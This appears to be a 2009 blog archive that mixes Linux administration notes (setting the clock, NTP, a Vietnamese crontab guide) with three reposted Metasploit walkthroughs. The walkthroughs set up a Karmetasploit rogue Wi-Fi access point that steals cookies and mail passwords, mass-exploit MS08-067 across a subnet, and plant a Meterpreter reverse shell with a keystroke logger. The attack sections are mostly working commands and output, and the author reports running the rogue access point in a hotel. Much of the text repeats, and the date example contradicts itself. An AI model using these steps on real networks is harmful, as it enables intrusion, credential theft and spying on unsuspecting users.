http://www.debianadmin.com/backup-and-restore-linux-partitions-using-partimage.html
http://www.psychocats.net/ubuntu/partimage
Thursday, July 23, 2009
Wednesday, July 22, 2009
Manage Time in Ubuntu Through Command Line
View Time
To view the current date and time, the following command will be enough
date
Set Time
To change time means to set a new time. To set time in Ubuntu (or any Linux), just run the following command
sudo date newdatetimestring
where newdatetimestring has to follow the format nnddhhmmyyyy.ss which is described below
- nn is a two digit month, between 01 to 12
- dd is a two digit day, between 01 and 31, with the regular rules for days according to month and year applying
- hh is two digit hour, using the 24-hour period so it is between 00 and 23
- mm is two digit minute, between 00 and 59
- yyyy is the year; it can be two digit or four digit: your choice. I prefer to use four digit years whenever I can for better clarity and less confusion
- ss is two digit seconds. Notice the period ‘.’ before the ss.
Let’s say you want to set your computer’s new time to December 6, 2007, 22:43:55, then you would use:
sudo date 120622432007.55
where 12 is the month, 17 is the day, 10 is the hour, 45 is the minute, and 2006 is the year!
Change Time Zone
You may update or change your time zone by
tzconfig
This command will guide you through the process of setting a new time zone. You may also choose UTC (GMT) if you want.
If your system does not have tzconfig, you may use something else.
tzselect
This will provide a set of different time zones to choose. If you would like to set the time to UTC, choose the option which says something like ‘none of the above’, or ‘none of these’ or something to this effect. In my case it was option 11. Then it asks for difference from UTC (GMT and GST is also the same thing). I chose GST-0 as the option and it set the time as UTC.
dpkg-reconfigure tzdata
Sync Clock Via NTP
If you want to sync your clock with NTP servers, it is also very easy. Just make sure you have the file ntp.conf file in /etc. How can you check it?
ls /etc/ntp.conf
If you see /etc/ntp.conf as a result, you already have that file. If the ls command gives an error, you do not have it. If so, you may create it yourself.
sudo vim /etc/ntp.conf
This file will be used to automatic synchronization of the clock. I do not know if the client uses this file automatically or one has to configure something first.
Whether you have the file already or not, make sure it has at least the following data
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
server 1.pool.ntp.org
server 2.pool.ntp.org
server pool.ntp.org
Here you may replace, add, and/or remove any servers you wish. You will find a list of time servers from the public NTP time server list.
You may manually sync the clock using the following
sudo ntpdate servername
where servername can be any public or private time server. You may always choose the following without hesitation
sudo ntpdate pool.ntp.org
Tuesday, July 21, 2009
Sơ lược về crontab
1. Cron là gì?
Cron là một tiện ích cho phép thực hiện các tác vụ một cách tự động theo định kỳ, ở chế độ nền của hệ thống. Crontab (CRON TABle) là một file chứa đựng bảng biểu (schedule) của các entries được chạy.
2. Cron làm việc thế nào?
Một cron schedule đơn giản là một text file. Mỗi người dùng có một cron schedule riêng, file này thường nằm ở /var/spool/cron. Crontab files không cho phép bạn tạo hoặc chỉnh sửa trực tiếp với bất kỳ trình text editor nào, trừ phi bạn dùng lệnh crontab. Một số lệnh thường dùng:
3. Cấu trúc của crontab
Một crontab file có 5 trường xác định thời gian, cuối cùng là lệnh sẽ được chạy định kỳ, cấu trúc như sau:
Code:
Nếu một cột được gán ký tự *, nó có nghĩa là tác vụ sau đó sẽ được chạy ở mọi giá trị cho cột đó.
4. Ví dụ
Giả sử tôi viết một đoạn script backup bookmarks trong Firefox như sau:
Code:
sau đó tôi cho script này chạy định kỳ vào 15h thứ Hai và thứ Năm hàng tuần bằng cách tạo một file crontab như sau:
Code:
Cuối cùng, nhớ khởi động lại cron daemon:
Code:
ps: Để muốn "test" ngay xem crontab nó có hoạt động không, bạn có thể sửa lại đoạn script trên một chút:
Code:
và file crontab bạn sẽ cho backup liên tục theo từng phút như sau:
Cron là một tiện ích cho phép thực hiện các tác vụ một cách tự động theo định kỳ, ở chế độ nền của hệ thống. Crontab (CRON TABle) là một file chứa đựng bảng biểu (schedule) của các entries được chạy.
2. Cron làm việc thế nào?
Một cron schedule đơn giản là một text file. Mỗi người dùng có một cron schedule riêng, file này thường nằm ở /var/spool/cron. Crontab files không cho phép bạn tạo hoặc chỉnh sửa trực tiếp với bất kỳ trình text editor nào, trừ phi bạn dùng lệnh crontab. Một số lệnh thường dùng:
crontab -e: tạo hoặc chỉnh sửa file crontab
crontab -l: hiển thị file crontab
crontab -r: xóa file crontab
3. Cấu trúc của crontab
Một crontab file có 5 trường xác định thời gian, cuối cùng là lệnh sẽ được chạy định kỳ, cấu trúc như sau:
Code:
* * * * * command to be executed
- - - - -
| | | | |
| | | | +----- day of week (0 - 6) (Sunday=0)
| | | +------- month (1 - 12)
| | +--------- day of month (1 - 31)
| +----------- hour (0 - 23)
+------------- min (0 - 59)
Nếu một cột được gán ký tự *, nó có nghĩa là tác vụ sau đó sẽ được chạy ở mọi giá trị cho cột đó.
4. Ví dụ
Giả sử tôi viết một đoạn script backup bookmarks trong Firefox như sau:
Code:
#!/bin/bash
date=`date +%F`
cp ~/.mozilla/firefox/13kee53o.default/bookmarks.html /mnt/data/BACKUP/bookmarks-$date.html
sau đó tôi cho script này chạy định kỳ vào 15h thứ Hai và thứ Năm hàng tuần bằng cách tạo một file crontab như sau:
Code:
$ export EDITOR=vi && crontab -e
0 15 * * 1,4 sh /mnt/data/linux/code/backupbookmarks.sh
Cuối cùng, nhớ khởi động lại cron daemon:
Code:
/etc/init.d/cron restart
ps: Để muốn "test" ngay xem crontab nó có hoạt động không, bạn có thể sửa lại đoạn script trên một chút:
Code:
#!/bin/bash
date=`date +%F-%H-%M-%S`
cp ~/.mozilla/firefox/13kee53o.default/bookmarks.html /mnt/data/BACKUP/bookmarks-$date.html
và file crontab bạn sẽ cho backup liên tục theo từng phút như sau:
0-59 * * * * sh /mnt/data/linux/code/backupbookmarks.sh
Friday, July 3, 2009
Metasploit + Karma=Karmetasploit
HD Moore released some documentation to get karmetasploit working with the framework.
First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.
You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.
Let's do our aireplay-ng test to see if things are working:
root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%
Look's like we are good.
Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.
With all the config files set up its pretty easy to get things going.
root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...
airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmetasploit documentation)
root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0
root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400
root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800
After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.
root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net
After that we run our karma.rc file within using msfconsole.
root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
Ok, so we have everything up and running (first post) and waiting for some random person...err your lab wifi box to connect to Karmetasploit.
We take a look at our current network connection before airbase-ng starts doing its thing.
*Note the blistering connection I had at the hotel.
Now we take a look at some of the available APs after airbase-ng starts doing its thing.
And lastly my computer connected to the hhonors AP
After that we open up our browser and try to go to google.com and we get the portal page that karmetasploit presents.
But as soon as we click enter or try to browse to a different URL a whole bunch of iframes start doing their thing trying to do the cookie theft and exploitation. You can see it in the bottom left corner.
Here we can see the result of ipconfig /all and see that my DHCP Server and DNS server is from karmetasploit.
A shot of airbase-ng doing its thing
Iphones connecting up
Cookie theft
POP password gathering
I saw the SMB Relay attack attempted a couple of times but I didnt see any of the other client side attacks being launched. Not sure what the issue is. I'm going to try it with a known vulnerable version of IE6 and see if I can get some better results. First instinct is that the browser enumeration code in browswer_autopwn isnt working quite right therefore not sending and clients sides out, but I could be wrong.
That's it for now.
First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.
You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.
Let's do our aireplay-ng test to see if things are working:
root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%
Look's like we are good.
Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.
With all the config files set up its pretty easy to get things going.
root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...
airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmetasploit documentation)
root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0
root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400
root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800
After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.
root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net
After that we run our karma.rc file within using msfconsole.
root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
Ok, so we have everything up and running (first post) and waiting for some random person...err your lab wifi box to connect to Karmetasploit.
We take a look at our current network connection before airbase-ng starts doing its thing.
*Note the blistering connection I had at the hotel.
Now we take a look at some of the available APs after airbase-ng starts doing its thing.
And lastly my computer connected to the hhonors AP
After that we open up our browser and try to go to google.com and we get the portal page that karmetasploit presents.
But as soon as we click enter or try to browse to a different URL a whole bunch of iframes start doing their thing trying to do the cookie theft and exploitation. You can see it in the bottom left corner.
Here we can see the result of ipconfig /all and see that my DHCP Server and DNS server is from karmetasploit.
A shot of airbase-ng doing its thing
Iphones connecting up
Cookie theft
POP password gathering
I saw the SMB Relay attack attempted a couple of times but I didnt see any of the other client side attacks being launched. Not sure what the issue is. I'm going to try it with a known vulnerable version of IE6 and see if I can get some better results. First instinct is that the browser enumeration code in browswer_autopwn isnt working quite right therefore not sending and clients sides out, but I could be wrong.
That's it for now.
Metasploit Mass Exploitation for Dummies
One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy!
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy!
Remote Keystroke Sniffing with Meterpreter
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This is a test of the keystroke logger I am typing this inside of notepad.
http://blog.metasploit.com/2009/03/remote-keystroke-sniffing-with.html
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
